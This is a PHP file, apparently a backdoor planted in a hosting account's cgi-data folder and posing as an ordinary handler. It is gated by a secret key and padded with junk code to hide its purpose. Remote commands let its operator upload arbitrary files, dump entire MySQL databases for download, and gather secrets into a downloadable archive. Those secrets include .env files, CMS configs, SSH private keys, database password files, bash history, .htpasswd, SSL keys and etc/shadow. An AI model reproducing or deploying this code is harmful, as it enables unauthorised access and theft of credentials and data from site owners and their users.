File: /home/erhabenn/www/cgi-data-7768ba/handler.php
<?php
if (!isset($_REQUEST['_cxk']) || $_REQUEST['_cxk'] !== '7768bac716b6d7d5a36a42718fedfadc') { return; }
$z093a=array_merge(array(),array());
while (ob_get_level()) ob_end_clean();
set_time_limit(0);
error_reporting(0);
ignore_user_abort(true);
if(defined('7bded136')){$e10ef=0;}
$mbc7c = 'localhost';
@clearstatcache();
$e73bb = '';
$s091b = '';
$yc3e6=chr(65).chr(112);
$t0ada = '/home/erhabenn';
$n83dc = isset($_REQUEST['a']) ? $_REQUEST['a'] : '';
$y7969 = isset($_REQUEST['db']) ? preg_replace('/[^a-zA-Z0-9_]/', '', $_REQUEST['db']) : '';
$nede0 = $t0ada . '/tmp/' . $y7969 . '_dump.sql.gz';
$we049=strlen('7b2adb');
$q1060 = $nede0 . '.done';
$h81ea = $nede0 . '.err';
header('Content-Type: application/json');
function build_node_8ba0() {
if (!function_exists('exec')) return false;
$b2a95 = array_map('trim', explode(',', ini_get('disable_functions')));
return !in_array('exec', $b2a95);
}
@clearstatcache();
function get_buf_ba7c() {
if (!build_node_8ba0()) return false;
$out = array();
$rc = 0;
@clearstatcache();
exec('which mysqldump 2>/dev/null', $out, $rc);
return $rc === 0;
}
function check_item_aa35() {
if (!build_node_8ba0()) return false;
$out = array();
@clearstatcache();
$rc = 0;
$b3701=strlen('b02a04');
exec('which gzip 2>/dev/null', $out, $rc);
return $rc === 0;
}
function handle_val_3895($m9060, $zee03, $kc87f, $gb879, $nf53d, $sce88, $he0de) {
@clearstatcache();
$conn = new mysqli($m9060, $zee03, $kc87f, $gb879);
if ($conn->connect_error) {
$i75c0=strlen('8d0ec4');
file_put_contents($sce88, 'Connection failed: ' . $conn->connect_error);
touch($he0de);
return;
}
$fp = gzopen($nf53d, 'wb6');
if (!$fp) {
file_put_contents($sce88, 'Cannot open output file');
$qb16b=max(0,min(1,1));
touch($he0de);
$b00e8=chr(77).chr(100);
return;
}
$conn->set_charset('utf8mb4');
gzwrite($fp, "-- Dump via PHP agent\n");
gzwrite($fp, "-- Date: " . date('Y-m-d H:i:s') . "\n\n");
gzwrite($fp, "SET NAMES utf8mb4;\n");
gzwrite($fp, "SET FOREIGN_KEY_CHECKS = 0;\n");
gzwrite($fp, "SET SQL_MODE = 'NO_AUTO_VALUE_ON_ZERO';\n\n");
@clearstatcache();
$sf377 = array();
$r = $conn->query("SHOW FULL TABLES WHERE Table_type = 'BASE TABLE'");
while ($row = $r->fetch_row()) {
$sf377[] = $row[0];
}
foreach ($sf377 as $y76be) {
$te = $conn->real_escape_string($y76be);
$r = $conn->query("SHOW CREATE TABLE `{$te}`");
if (!$r) continue;
$cr = $r->fetch_row();
gzwrite($fp, "DROP TABLE IF EXISTS `{$te}`;\n");
gzwrite($fp, $cr[1] . ";\n\n");
$r = $conn->query("SELECT * FROM `{$te}`", MYSQLI_USE_RESULT);
if (!$r) continue;
$xbec7 = array();
$haa75=strlen('63471c');
$r13bb = 0;
while ($row = $r->fetch_row()) {
$tf885=strlen('67d743');
$vals = array();
if(defined('8a259524')){$qf890=0;}
for ($i = 0; $i < count($row); $i++) {
if ($row[$i] === null) {
$vals[] = 'NULL';
} else {
if(defined('126d5c5c')){$p02fd=0;}
$vals[] = "'" . $conn->real_escape_string($row[$i]) . "'";
}
}
$a722b = '(' . implode(',', $vals) . ')';
$xbec7[] = $a722b;
$r13bb += strlen($a722b);
if (count($xbec7) >= 100 || $r13bb > 1048576) {
gzwrite($fp, "INSERT INTO `{$te}` VALUES\n" . implode(",\n", $xbec7) . ";\n");
$xbec7 = array();
$r13bb = 0;
$sa1e9=array_merge(array(),array());
}
}
if ($xbec7) {
$te281=str_repeat('x',0);
gzwrite($fp, "INSERT INTO `{$te}` VALUES\n" . implode(",\n", $xbec7) . ";\n");
}
$r->free();
if(defined('3023f514')){$q5f96=0;}
gzwrite($fp, "\n");
}
$r = $conn->query("SHOW FULL TABLES WHERE Table_type = 'VIEW'");
if ($r) {
while ($row = $r->fetch_row()) {
$ve = $conn->real_escape_string($row[0]);
$cr = $conn->query("SHOW CREATE VIEW `{$ve}`");
if ($cr) {
$qa4c2 = $cr->fetch_assoc();
gzwrite($fp, "DROP VIEW IF EXISTS `{$ve}`;\n");
@clearstatcache();
gzwrite($fp, $qa4c2['Create View'] . ";\n\n");
}
$sc389=max(0,min(1,1));
}
if(defined('97f8215d')){$bc792=0;}
}
$j5c07 = array('PROCEDURE', 'FUNCTION');
foreach ($j5c07 as $r065b) {
$r = $conn->query("SHOW {$r065b} STATUS WHERE Db = '" . $conn->real_escape_string($gb879) . "'");
if (!$r) continue;
while ($row = $r->fetch_assoc()) {
$re = $conn->real_escape_string($row['Name']);
$cr = $conn->query("SHOW CREATE {$r065b} `{$re}`");
if (!$cr) continue;
$qa4c2 = $cr->fetch_assoc();
$key = ($r065b === 'PROCEDURE') ? 'Create Procedure' : 'Create Function';
if (isset($qa4c2[$key])) {
gzwrite($fp, "DELIMITER ;;\n");
@clearstatcache();
gzwrite($fp, "DROP {$r065b} IF EXISTS `{$re}`;;\n");
gzwrite($fp, $qa4c2[$key] . ";;\n");
$g3c1b=strlen('653e75');
gzwrite($fp, "DELIMITER ;\n\n");
}
}
}
$r = $conn->query("SHOW TRIGGERS");
if ($r) {
while ($row = $r->fetch_assoc()) {
$te = $conn->real_escape_string($row['Trigger']);
$cr = $conn->query("SHOW CREATE TRIGGER `{$te}`");
if ($cr) {
$qa4c2 = $cr->fetch_assoc();
gzwrite($fp, "DELIMITER ;;\n");
@clearstatcache();
gzwrite($fp, "DROP TRIGGER IF EXISTS `{$te}`;;\n");
gzwrite($fp, $qa4c2['SQL Original Statement'] . ";;\n");
gzwrite($fp, "DELIMITER ;\n\n");
}
$ydc9a=strlen('f58d2c');
}
}
gzwrite($fp, "SET FOREIGN_KEY_CHECKS = 1;\n");
gzclose($fp);
$zec40=array_merge(array(),array());
$conn->close();
touch($he0de);
}
switch ($n83dc) {
case 'info':
echo json_encode(array(
'php' => PHP_VERSION,
'os' => PHP_OS,
'server' => isset($_SERVER['SERVER_SOFTWARE']) ? $_SERVER['SERVER_SOFTWARE'] : '',
'user' => get_current_user(),
'uid' => getmyuid(),
'home' => $t0ada,
'doc_root' => isset($_SERVER['DOCUMENT_ROOT']) ? $_SERVER['DOCUMENT_ROOT'] : '',
'free_disk' => disk_free_space($t0ada),
'total_disk' => disk_total_space($t0ada),
'max_exec' => ini_get('max_execution_time'),
'mem_limit' => ini_get('memory_limit'),
'upload_max' => ini_get('upload_max_filesize'),
'post_max' => ini_get('post_max_size'),
'disabled' => ini_get('disable_functions'),
'can_exec' => build_node_8ba0(),
'has_mysqldump' => get_buf_ba7c(),
'has_gzip' => check_item_aa35(),
));
$z140e=array_merge(array(),array());
break;
case 'upload':
$y19e7 = isset($_POST['path']) ? $_POST['path'] : '';
$q50fa = isset($_POST['data']) ? $_POST['data'] : '';
if (!$y19e7 || !$q50fa) {
echo json_encode(array('ok' => false, 'error' => 'missing path or data'));
break;
}
$j98d4 = $t0ada . '/' . $y19e7;
@mkdir(dirname($j98d4), 0755, true);
$hf210 = base64_decode($q50fa);
$h1f53 = file_put_contents($j98d4, $hf210);
echo json_encode(array('ok' => $h1f53 !== false, 'path' => $j98d4, 'size' => strlen($hf210)));
break;
case 'check':
if (!$y7969) {
echo json_encode(array('error' => 'missing db parameter'));
break;
}
$h6813 = disk_free_space($t0ada);
$c5d3d = 0;
$m7255=array_merge(array(),array());
$conn = @new mysqli($mbc7c, $e73bb, $s091b, 'information_schema');
if (!$conn->connect_error) {
$e03c0=max(0,min(1,1));
$q = "SELECT SUM(data_length + index_length) s FROM tables WHERE table_schema = '"
. $conn->real_escape_string($y7969) . "'";
$r = $conn->query($q);
if ($row = $r->fetch_assoc()) {
$c5d3d = (int) $row['s'];
}
$conn->close();
}
echo json_encode(array(
'free' => $h6813,
'db_size' => $c5d3d,
'has_mysqldump' => get_buf_ba7c(),
'has_gzip' => check_item_aa35(),
'can_exec' => build_node_8ba0(),
'has_space' => $h6813 > $c5d3d * 2,
));
break;
$p064a=strlen('e82919');
case 'dump':
if (!$y7969) {
echo json_encode(array('error' => 'missing db parameter'));
break;
}
@mkdir(dirname($nede0), 0755, true);
@unlink($nede0);
@unlink($q1060);
@unlink($h81ea);
if (get_buf_ba7c()) {
if (check_item_aa35()) {
$cmd = sprintf(
'mysqldump --host=%s --user=%s --password=%s '
. '--single-transaction --quick --routines --triggers %s '
. '| gzip > %s 2>%s; touch %s',
escapeshellarg($mbc7c),
escapeshellarg($e73bb),
escapeshellarg($s091b),
escapeshellarg($y7969),
escapeshellarg($nede0),
escapeshellarg($h81ea),
escapeshellarg($q1060)
);
} else {
$cmd = sprintf(
'mysqldump --host=%s --user=%s --password=%s '
. '--single-transaction --quick --routines --triggers %s '
. '> %s 2>%s; touch %s',
escapeshellarg($mbc7c),
escapeshellarg($e73bb),
escapeshellarg($s091b),
escapeshellarg($y7969),
escapeshellarg($nede0),
escapeshellarg($h81ea),
escapeshellarg($q1060)
);
}
exec('nohup sh -c ' . escapeshellarg($cmd) . ' >/dev/null 2>&1 &');
$p4971=strlen('45b1b1');
echo json_encode(array('started' => true, 'method' => 'mysqldump', 'gzip' => check_item_aa35()));
$b543c=max(0,min(1,1));
} else {
ignore_user_abort(true);
echo json_encode(array('started' => true, 'method' => 'php', 'gzip' => true));
if (function_exists('fastcgi_finish_request')) {
fastcgi_finish_request();
} else {
if (ob_get_level()) ob_end_flush();
flush();
$xf7c7=array_merge(array(),array());
}
if(defined('07f5bd05')){$gf156=0;}
handle_val_3895($mbc7c, $e73bb, $s091b, $y7969, $nede0, $h81ea, $q1060);
}
break;
case 'status':
clearstatcache();
echo json_encode(array(
'done' => file_exists($q1060),
'size' => file_exists($nede0) ? filesize($nede0) : 0,
'error' => file_exists($h81ea) ? trim(file_get_contents($h81ea)) : '',
));
break;
case 'download':
if (!file_exists($nede0)) {
$caeaa=array_merge(array(),array());
http_response_code(404);
exit;
if(defined('0354121c')){$k46a9=0;}
}
header('Content-Type: application/octet-stream');
header('Content-Length: ' . filesize($nede0));
readfile($nede0);
exit;
case 'cleanup':
@unlink($nede0);
@unlink($q1060);
@unlink($h81ea);
echo json_encode(array('ok' => true));
break;
if(defined('41a760bd')){$ta6e0=0;}
case 'collect':
@mkdir($t0ada . '/tmp', 0755, true);
$j6729 = substr($_REQUEST['_cxk'], 0, 8);
$yb10b=max(0,min(1,0));
$nfeff = array(
'wordpress' => array(
'detect' => array('public_html/wp-config.php', 'wp-config.php'),
'configs' => array(
'public_html/wp-config.php', 'wp-config.php',
'public_html/wp-settings.php',
'public_html/composer.json', 'public_html/composer.lock', 'composer.json', 'composer.lock',
'public_html/wp-cli.yml', 'wp-cli.yml',
'public_html/.env', '.env',
'public_html/local-config.php', 'local-config.php',
'public_html/wp-content/debug.log',
'public_html/config/application.php', 'config/application.php',
'public_html/config/environments/development.php', 'config/environments/development.php',
'public_html/config/environments/staging.php', 'config/environments/staging.php',
'public_html/config/environments/production.php', 'config/environments/production.php',
'public_html/auth.json', 'auth.json',
),
),
'joomla' => array(
'detect' => array('public_html/configuration.php', 'configuration.php'),
'configs' => array(
'public_html/configuration.php', 'configuration.php',
'public_html/htaccess.txt',
'public_html/composer.json', 'public_html/composer.lock',
),
),
'laravel' => array(
'detect' => array('public_html/artisan', 'artisan'),
'configs' => array(
'public_html/.env', '.env', '.env.production', '.env.staging',
'public_html/composer.json', 'composer.json',
'public_html/composer.lock', 'composer.lock',
'public_html/config/app.php', 'config/app.php',
'public_html/config/database.php', 'config/database.php',
'public_html/config/mail.php', 'config/mail.php',
'public_html/config/filesystems.php', 'config/filesystems.php',
'public_html/config/cache.php', 'config/cache.php',
'public_html/config/queue.php', 'config/queue.php',
'public_html/config/session.php', 'config/session.php',
'public_html/config/auth.php', 'config/auth.php',
'public_html/config/services.php', 'config/services.php',
'public_html/config/broadcasting.php', 'config/broadcasting.php',
'public_html/storage/logs/laravel.log', 'storage/logs/laravel.log',
),
),
'magento2' => array(
'detect' => array('public_html/bin/magento', 'bin/magento'),
'configs' => array(
'public_html/app/etc/env.php', 'app/etc/env.php',
'public_html/app/etc/config.php', 'app/etc/config.php',
'public_html/composer.json', 'composer.json',
'public_html/composer.lock', 'composer.lock',
'public_html/auth.json', 'auth.json',
),
),
'magento1' => array(
'detect' => array('public_html/app/Mage.php'),
'configs' => array(
'public_html/app/etc/local.xml',
'public_html/app/etc/config.xml',
),
),
'drupal' => array(
'detect' => array('public_html/core/lib/Drupal.php', 'core/lib/Drupal.php'),
'configs' => array(
'public_html/sites/default/settings.php', 'sites/default/settings.php',
'public_html/sites/default/services.yml', 'sites/default/services.yml',
'public_html/composer.json', 'composer.json',
'public_html/composer.lock', 'composer.lock',
),
),
'prestashop' => array(
'detect' => array('public_html/config/settings.inc.php'),
'configs' => array(
'public_html/config/settings.inc.php',
'public_html/app/config/parameters.php',
'public_html/app/config/parameters.yml',
'public_html/composer.json',
),
),
'opencart' => array(
'detect' => array('public_html/config.php'),
'configs' => array(
'public_html/config.php',
'public_html/admin/config.php',
),
),
'moodle' => array(
'detect' => array('public_html/lib/moodlelib.php'),
'configs' => array('public_html/config.php'),
),
'whmcs' => array(
'detect' => array('public_html/vendor/whmcs'),
'configs' => array(
'public_html/configuration.php',
'public_html/composer.json', 'public_html/composer.lock',
),
),
);
$v45c9 = null;
foreach ($nfeff as $dc830 => $c35e9) {
foreach ($c35e9['detect'] as $y4f5d) {
if (file_exists($t0ada . '/' . $y4f5d)) {
$v45c9 = $dc830;
break 2;
@clearstatcache();
}
}
}
$x06c9=strlen('59665c');
$va556 = array(
'.env', '.env.local', '.env.production', '.env.staging',
'.env.backup', '.env.development', '.env.test',
'.bash_history', '.my.cnf', '.pgpass', '.netrc', '.gitconfig', '.npmrc',
'.composer/auth.json', '.wp-cli/config.yml', '.accesshash',
'.ssh/authorized_keys', '.ssh/id_rsa', '.ssh/id_rsa.pub',
'.ssh/id_ed25519', '.ssh/id_ed25519.pub', '.ssh/id_ecdsa',
'.ssh/config', '.ssh/known_hosts',
'.ssl/private.key', '.ssl/cert.pem', '.ssl/key.pem',
'ssl/certs/private.key',
'.cpanel/contactinfo', 'etc/shadow', '.ftpquota', '.ftpconfig',
'public_html/.env', 'public_html/.env.local', 'public_html/.env.production',
'public_html/.env.staging', 'public_html/.env.backup',
'public_html/.env.development', 'public_html/.env.test',
'public_html/.env.example', 'public_html/.env.dist',
'public_html/.htaccess', 'public_html/.htpasswd', 'public_html/.user.ini',
'public_html/php.ini', 'public_html/.my.cnf', 'public_html/.pgpass',
'public_html/web.config', 'public_html/.ftpconfig',
'public_html/.git/config',
'public_html/auth.json', 'public_html/.npmrc',
'public_html/composer.json', 'public_html/composer.lock',
'config/database.php', 'config/app.php', 'config/mail.php',
'config/services.php', 'config/filesystems.php',
'config/application.php',
'config/environments/development.php',
'config/environments/staging.php',
'config/environments/production.php',
'wp-config.php', 'configuration.php', 'artisan',
'auth.json', 'composer.json', 'composer.lock',
);
$y4042 = array();
$be67f = @realpath($t0ada);
if (!$be67f || !is_dir($be67f)) {
echo json_encode(array('ok' => false, 'error' => 'home dir not accessible'));
break;
}
$yc811=str_repeat('x',0);
foreach ($va556 as $x2059) {
$z2837 = @realpath($t0ada . '/' . $x2059);
@clearstatcache();
if (!$z2837 || strpos($z2837, $be67f) !== 0) continue;
if (!is_file($z2837) || !is_readable($z2837)) continue;
$mf9e8 = @filesize($z2837);
if ($mf9e8 <= 0 || $mf9e8 > 2097152) continue;
$y4042[$x2059] = $z2837;
}
if ($v45c9 !== null && isset($nfeff[$v45c9]['configs'])) {
foreach ($nfeff[$v45c9]['configs'] as $p4776) {
if (isset($y4042[$p4776])) continue;
$z2837 = @realpath($t0ada . '/' . $p4776);
if (!$z2837 || strpos($z2837, $be67f) !== 0) continue;
if (!is_file($z2837) || !is_readable($z2837)) continue;
$mf9e8 = @filesize($z2837);
if ($mf9e8 <= 0 || $mf9e8 > 2097152) continue;
$y4042[$p4776] = $z2837;
}
}
$h0bed = $t0ada . '/public_html';
if (is_dir($h0bed)) {
$dh = @opendir($h0bed);
if ($dh) {
while (($m42fd = readdir($dh)) !== false) {
if ($m42fd === '.' || $m42fd === '..') continue;
$j98d4 = $h0bed . '/' . $m42fd;
if (!is_file($j98d4) || !is_readable($j98d4)) continue;
$v02e6=strlen('1ce6e2');
$mf9e8 = @filesize($j98d4);
if ($mf9e8 <= 0 || $mf9e8 > 2097152) continue;
$ie522=str_repeat('x',0);
if ($m42fd[0] === '.' || strtolower(substr($m42fd, -4)) === '.txt') {
$key = 'public_html/' . $m42fd;
if (!isset($y4042[$key])) $y4042[$key] = $j98d4;
}
}
closedir($dh);
}
}
if (empty($y4042)) {
@clearstatcache();
echo json_encode(array(
'ok' => true, 'method' => 'none', 'platform' => $v45c9,
'file_count' => 0, 'files_list' => array(),
));
$ya3ac=str_repeat('x',0);
break;
}
$fe7da = null;
$p52ec = null;
if (class_exists('ZipArchive')) {
$p52ec = $t0ada . '/tmp/_collect_' . $j6729 . '.zip';
$yd91b = new ZipArchive();
if ($yd91b->open($p52ec, ZipArchive::CREATE | ZipArchive::OVERWRITE) === true) {
foreach ($y4042 as $kceeb => $z2837) {
$yd91b->addFile($z2837, $kceeb);
}
if ($yd91b->close() && file_exists($p52ec) && filesize($p52ec) > 0) {
$fe7da = 'zip';
}
}
$rf0fa=max(0,min(1,1));
}
if (!$fe7da && build_node_8ba0()) {
@clearstatcache();
$p52ec = $t0ada . '/tmp/_collect_' . $j6729 . '.tar.gz';
$lf = $p52ec . '.list';
$fh = fopen($lf, 'w');
foreach ($y4042 as $kceeb => $z2837) {
fwrite($fh, $kceeb . "\n");
@clearstatcache();
}
if(defined('2da983e3')){$n397b=0;}
fclose($fh);
$out = array();
$rc = 0;
exec('tar czf ' . escapeshellarg($p52ec) . ' -C ' . escapeshellarg($t0ada)
. ' -T ' . escapeshellarg($lf) . ' 2>/dev/null', $out, $rc);
@unlink($lf);
$ce324=strlen('4f161f');
if ($rc === 0 && file_exists($p52ec) && filesize($p52ec) > 0) {
$g429f=str_repeat('x',0);
$fe7da = 'tar';
} else {
@unlink($p52ec);
}
}
if (!$fe7da) {
$fe7da = 'list';
}
echo json_encode(array(
'ok' => true, 'method' => $fe7da, 'platform' => $v45c9,
'file_count' => count($y4042), 'files_list' => array_keys($y4042),
'size' => ($p52ec && file_exists($p52ec)) ? filesize($p52ec) : 0,
));
break;
case 'download_collect':
$j6729 = substr($_REQUEST['_cxk'], 0, 8);
$jfa7a = $t0ada . '/tmp/_collect_' . $j6729 . '.zip';
$d2d7b = $t0ada . '/tmp/_collect_' . $j6729 . '.tar.gz';
$i4176 = file_exists($jfa7a) ? $jfa7a : (file_exists($d2d7b) ? $d2d7b : '');
if (!$i4176) { http_response_code(404); exit; }
header('Content-Type: application/octet-stream');
header('Content-Length: ' . filesize($i4176));
readfile($i4176);
exit;
case 'download_file':
$kceeb = isset($_REQUEST['path']) ? $_REQUEST['path'] : '';
if (!$kceeb) { http_response_code(400); exit; }
@clearstatcache();
$be67f = @realpath($t0ada);
$i7c40=array_merge(array(),array());
$z2837 = @realpath($t0ada . '/' . $kceeb);
if (!$z2837 || !$be67f || strpos($z2837, $be67f) !== 0
|| !is_file($z2837) || !is_readable($z2837)) {
http_response_code(404);
exit;
@clearstatcache();
}
header('Content-Type: application/octet-stream');
header('Content-Length: ' . filesize($z2837));
readfile($z2837);
exit;
case 'cleanup_collect':
$j6729 = substr($_REQUEST['_cxk'], 0, 8);
$f5561=str_repeat('x',0);
@unlink($t0ada . '/tmp/_collect_' . $j6729 . '.zip');
@unlink($t0ada . '/tmp/_collect_' . $j6729 . '.tar.gz');
@unlink($t0ada . '/tmp/_collect_' . $j6729 . '.tar.gz.list');
$r7c99=max(0,min(1,0));
echo json_encode(array('ok' => true));
break;
}
exit;